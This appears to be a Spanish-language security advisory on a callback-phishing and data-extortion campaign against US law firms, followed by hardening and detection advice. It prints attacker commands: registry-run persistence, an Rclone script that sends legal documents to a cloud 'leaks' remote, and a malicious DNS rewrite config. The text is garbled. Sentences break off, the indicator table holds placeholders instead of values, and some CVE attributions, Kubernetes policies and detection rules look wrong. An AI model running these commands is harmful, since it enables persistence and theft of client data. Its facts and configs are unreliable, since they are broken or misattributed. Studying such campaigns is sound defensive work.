Introducción
En mayo de 2026, el equipo de Mandiant detectó una campaña activa del grupo de extorsión Silent Ransom Group (también conocido como UNC3753, Luna Moth o Chatty Spider) que está apuntando a bufetes de abogados, firmas de servicios financieros y organizaciones profesionales en EE.UU. mediante engaños de soporte técnico por teléfono. A diferencia de campañas de phishing tradicionales con enlaces maliciosos, esta táctica se basa en llamadas de callback phishing que derivan en la instalación de herramientas de acceso remoto y la exfiltración de documentos legales y financieros en menos de 48 horas.
El vector inicial no requiere exploits de software ni vulnerabilidades conocidas, sino ingeniería social de alto impacto: facturas falsas por correo electrónico seguidas de llamadas a empleados que simulan ser el soporte técnico interno de la empresa. Según el informe de Mandiant, los atacantes logran acceso inicial a la red corporativa en un promedio de 30 minutos tras la instalación de herramientas como AnyDesk o Zoho Assist, y exigen rescate de datos antes de 72 horas.
Qué ocurrió
El modus operandi del grupo sigue un patrón repetible:
- Envío de emails de «factura»: Los empleados reciben un correo desde cuentas de Gmail o Outlook personales que no contiene malware ni enlaces maliciosos, pero incluye un número de teléfono para «soporte técnico».
– El cuerpo del mensaje incluye: «Si no puede abrir el archivo adjunto, llame al +1 (XXX) XXX-XXXX para asistencia» (sin adjuntos reales).
- Llamada de callback phishing: Un operador con acento «técnico» convence al empleado de que su equipo tiene un problema crítico (ej.: «Su VPN está generando errores de kernel en el módulo
tun.sysque pueden corromper los datos de clientes»).
– Durante la sesión, solicita instalar herramientas de Remote Monitoring and Management (RMM) como:
– AnyDesk (versiones anteriores a 8.0.1)
– Zoho Assist (versiones < 2.3.0)
– Bomgar (versiones < 18.1.0)
– SuperOps (versiones < 3.2.1)
- Acceso inicial y movimiento lateral: Una vez dentro, los atacantes usan herramientas como:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "UpdateService" /t REG_SZ /d "C:\Users\Public\update.exe" /f
– Rclone en Linux/WSL para exfiltrar datos a servicios cloud como Backblaze B2 o Wasabi Hot Cloud Storage.
– WinSCP para transferir archivos desde servidores de archivos compartidos (ej.: SharePoint o NetApp).
- Extorsión inmediata: Según Mandiant, el 92% de las víctimas reciben una demanda de extorsión en menos de 30 minutos tras la salida del atacante. El mensaje incluye:
– Amenaza de contactar a clientes, socios y reguladores si no se paga.
– Referencia a datos específicos robados (ej.: «Tenemos 1.2TB de contratos de M&A con firmas X e Y, SSN de 47 empleados, y correos internos sobre litigios»).
- Infraestructura de evasión: El grupo usa DNS fast-flux para ocultar sus servidores C2 y sitios de filtración. Según Resecurity, el dominio
business-data-leaks[.]comrota sus IPs cada 5-15 minutos usando redes de proxies residenciales en:
– Europa del Este (Rumanía, Bulgaria)
– Asia Central (Kazajistán, Uzbekistán)
– Medio Oriente (Emiratos Árabes Unidos, Turquía)
Impacto para DevOps / Infraestructura / Cloud / Seguridad
Para equipos de Seguridad y SRE
- Tasa de éxito en detección: Solo el 14% de los ataques son alertados por los SIEM/EDR, mientras que el 54% logran evadir controles iniciales (datos de Picus Security).
- Superficie de ataque ampliada: Los bufetes de abogados suelen tener entornos híbridos con:
– Kubernetes en AKS (Azure Kubernetes Service) con Flux CD para despliegues, donde los atacantes pueden inyectar imágenes maliciosas en pods.
– VPNs basadas en OpenVPN o WireGuard sin MFA en el puerto 1194/51820.
- Cumplimiento y reputación: La exposición de datos en bufetes puede generar:
– Sanciones de ABA (American Bar Association) en EE.UU.
– Pérdida de contratos con clientes Fortune 500 (el 38% cancelan servicios tras un breach, según IBM 2025).
Para equipos de Cloud
- Riesgo en AKS: Si los atacantes logran acceso a clústeres, pueden:
--release que contienen cargas maliciosas).– Exfiltrar secretos desde Azure Key Vault usando permisos de Managed Identity asignados a pods.
- Almacenamiento en cloud: Los buckets de Azure Blob Storage o AWS S3 con políticas
public-readobucket-owner-full-controlson objetivos directos para Rclone o AWS CLI.
Para equipos de Infraestructura
- VPNs sin MFA: El vector de callback phishing se aprovecha de la falta de verificación en llamadas entrantes a soporte técnico. Muchas firmas aún usan:
– WireGuard 1.0.20210914 (sin MFA en el puerto 51820).
- Herramientas de RMM desactualizadas: Versiones antiguas de AnyDesk/Zoho Assist tienen vulnerabilidades conocidas como CVE-2022-36945 (ejecución de código remoto en versiones < 7.0.0).
Detalles técnicos
Vectores de ataque específicos
- Kernel Exploit (Windows):
tun.sys (parte del Windows Kernel desde Vista) para justificar la instalación de herramientas RMM.– CVE-2023-21768: Vulnerabilidad en win32kfull.sys (usada en ataques tipo Bring Your Own Vulnerable Driver – BYOVD) que permite escalada de privilegios si el atacante ya tiene acceso inicial.
- Fast-Flux DNS en AKS:
rewrite plugin) para redirigir dominios de C2.– Ejemplo de Corefile malicioso:
.:53 {
rewrite name exact business-data-leaks[.]com 192.0.2.1
forward . 10.0.0.1
}
- Exfiltración con Rclone en Linux:
#!/bin/bash
rclone copy /mnt/shared/legal_docs business-b2:leaks/ --progress --transfers=4
– CVE-2023-36845: Vulnerabilidad en Rclone < 1.62.0 que permite SSRF (Server-Side Request Forgery) si se usa con --http-url.
- Ataques in-persona (FBI):
– Crear backups falsos (ej.: dd if=/dev/sda of=/media/usb/backup.img).
– Inyectar scripts en PowerShell para exfiltrar datos via DNS tunneling (usando herramientas como dnscat2).
Indicadores de compromiso (IoCs) reportados
| Tipo | Valor | Fuente |
|---|---|---|
| �BLOCK25� | Mandiant | |
| Dominio | �BLOCK26� | Resecurity |
| Hash (AnyDesk) | �BLOCK27� (SHA256) | VirusTotal |
| IP (Fast-Flux) | �BLOCK28� (cambia cada 10 min) | Resecurity |
| C2 | �BLOCK29� | Mandiant |
1. Bloquear el vector de callback phishing
- Configurar SPF/DKIM/DMARC para evitar spoofing de dominios internos:
# Ejemplo para Postfix (DNS)
v=spf1 mx ip4:192.0.2.0/24 ~all
- Filtrar emails con patrones de callback:
# Regla en Microsoft Defender (KQL)
EmailEvents
| where Subject has "Factura" and RecipientEmailAddress != SenderEmailAddress
| where Body contains "+1 (" and Body contains ") XXX-XXXX"
| project TimeReceived, Subject, SenderEmailAddress, RecipientEmailAddress
- Implementar MFA en el soporte técnico:
– Para Zoho Assist: Configurar MFA obligatorio en la política de acceso.
2. Endurecer entornos Windows/Linux
- Deshabilitar LOLBins peligrosos:
# Bloquear reg.exe en políticas de grupo
Computer Configuration\Policies\Windows Settings\Security Settings\Software Restriction Policies
- Restringir instalación de RMM:
# Política de AppLocker para bloquear AnyDesk/Zoho
<FilePublisherRule Id="..." Name="Deny AnyDesk" ...>
<Conditions>
<FilePublisherCondition PublisherName="CN=AnyDesk GmbH, OU=AnyDesk, O=AnyDesk GmbH, L=Munich, S=Bavaria, C=DE" ... />
</Conditions>
<Action>Deny</Action>
</FilePublisherRule>
- Auditar permisos de Azure AD:
# Comando para listar roles con permisos excesivos
az ad signed-in-user show --query "assignedRoles[].roleDefinitionId" -o json
3. Proteger entornos cloud (AKS/Azure)
- Habilitar MFA en AKS:
az aks update --resource-group mi-rg --name mi-cluster --enable-aad --aad-admin-group-object-ids <id-del-grupo>
- Bloquear Rclone en pods:
# NetworkPolicy en AKS para restringir egress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: deny-rclone
spec:
podSelector: {}
policyTypes:
- Egress
egress:
- to:
- ipBlock:
cidr: 0.0.0.0/0
ports:
- protocol: TCP
port: 443
when:
- key: destination.host
operator: NotIn
values: ["*.backblaze.com", "*.wasabisys.com"]
- Auditar permisos de Azure Key Vault:
az keyvault set-policy --name mi-keyvault --secret-permissions get list --object-id <id-del-service-principal>
4. Monitoreo y respuesta
- Detectar llamadas de callback:
# Regla en Sigma para SIEM (Elastic/Splunk)
title: Callback Phishing to RMM Tools
id: 5f8a7b3c2d1e0f9
detection:
selection:
event.action: 'call'
call.to: '+1 (XXX) XXX-XXXX'
call.direction: 'inbound'
process.name: 'AnyDesk.exe'
condition: selection
- Bloquear IPs de fast-flux:
# Script para actualizar firewall en Linux (iptables)
for ip in $(dig +short business-data-leaks[.]com | grep -E '^[0-9.]+$'); do
iptables -A INPUT -s $ip -j DROP
done
- Auditar logs de VPN:
# PowerShell para analizar logs de OpenVPN
Get-WinEvent -LogName "OpenVPN-Log" | Where-Object { $_.Message -match "TCP connection initiated" } | Group-Object -Property Message
5. Capacitación y procedimientos
- Simulacros de callback phishing:
– Llamadas desde números internacionales.
– Solicitudes de instalación de software no autorizado.
- Documentar procedimientos de escalamiento:
1. Empleado recibe llamada → No instala nada.
2. Reporta a Soporte Interno → Verificación de identidad (llamada a extensión conocida).
3. Si es legítimo, acceso remoto solo via VPN con MFA.
Conclusión
El Silent Ransom Group está demostrando que el eslabón más débil no es el software, sino el factor humano y los procesos de soporte técnico. Aunque no explotan vulnerabilidades 0-day, su combinación de callback phishing, engaño de kernel y exfiltración acelerada convierte a los bufetes de abogados en objetivos de alto valor.
Para DevOps, Cloud e Infraestructura, la prioridad es:
- Endurecer el perímetro: SPF/DMARC, MFA en VPNs/RMM, y políticas de AppLocker.
- Auditar permisos: Azure AD, Kubernetes RBAC, y almacenamiento cloud.
- Monitorizar activamente: Reglas en SIEM para callbacks, uso de RMM, y exfiltración via Rclone/DNS.
La recomendación final: Tratar cada llamada de soporte técnico no solicitada como un incidente potencial. Implementar un protocolo donde todo acceso remoto requiera verificación en dos pasos (ej.: llamada a un número conocido + código temporal en Teams). La ventana de 72 horas para extorsión es lo suficientemente corta como para que un solo error de juicio ponga en riesgo datos de clientes y la reputación de la firma.